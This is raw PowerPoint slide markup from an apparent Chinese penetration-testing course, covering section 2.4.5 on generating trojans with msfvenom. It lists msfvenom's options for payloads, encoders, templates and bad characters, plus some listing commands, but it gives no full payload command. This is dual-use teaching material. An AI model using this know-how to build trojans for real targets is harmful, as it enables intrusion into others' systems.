          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="文本框 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="3870325"/>
            <a:ext cx="3379470" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>msfvenom是msfpayload、msfencode的结合体，利用msfvenom可以生成木马程序，并在目标机上执行，在本地监听上线。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481320" y="443865"/>
            <a:ext cx="5655310" cy="5692775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>msfvenom命令行选项如下：-p, --payload &lt;payload&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定需要使用的payload(攻击荷载)。-l, --list  [module_type] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>列出指定模块的所有可用资源。模块类型包括：payloads，encoders，nops，all。-n, --nopsled &lt;length&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为payload预先指定一个NOP滑动长度。-f, --format &lt;format&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定输出格式。-e, --encoder [encoder]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定需要使用的encoder（编码器）。-a, --arch  &lt;architecture&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定payload的目标架构。--platform  &lt;platform&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定payload的目标平台。-s, --space  &lt;length&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>设定有效攻击荷载的最大长度。-b, --bad-chars &lt;list&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>设定规避字符集。-i, --iterations &lt;count&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定payload的编码次数。-c, --add-code &lt;path&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定一个附加的win32 shellcode文件。-x, --template &lt;path&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定一个自定义的可执行文件作为模板。 -k, --keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>保护模板程序的动作，注入的payload作为一个新进程运行。 --payload-options    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>列举payload的标准选项。-o, --out   &lt;path&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>保存payload。-v, --var-name &lt;name&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定一个自定义的变量，以确定输出格式。--shellest    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>最小化生成payload。-h, --help   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查看帮助选项。 --help-formats  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查看msf支持的输出格式列表。使用方法如下：1.msfvenom --list platforms  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>显示支持的平台。2.msfvenom --list formats   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>显示支持的格式。3.msfvenom --list archs     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>显示支持的架构。4.msfvenom --list encoders   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>显示支持的编码器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用msfvenom模块生成木马的方法</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="文本框 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5154295" y="1519555"/>
            <a:ext cx="5647055" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
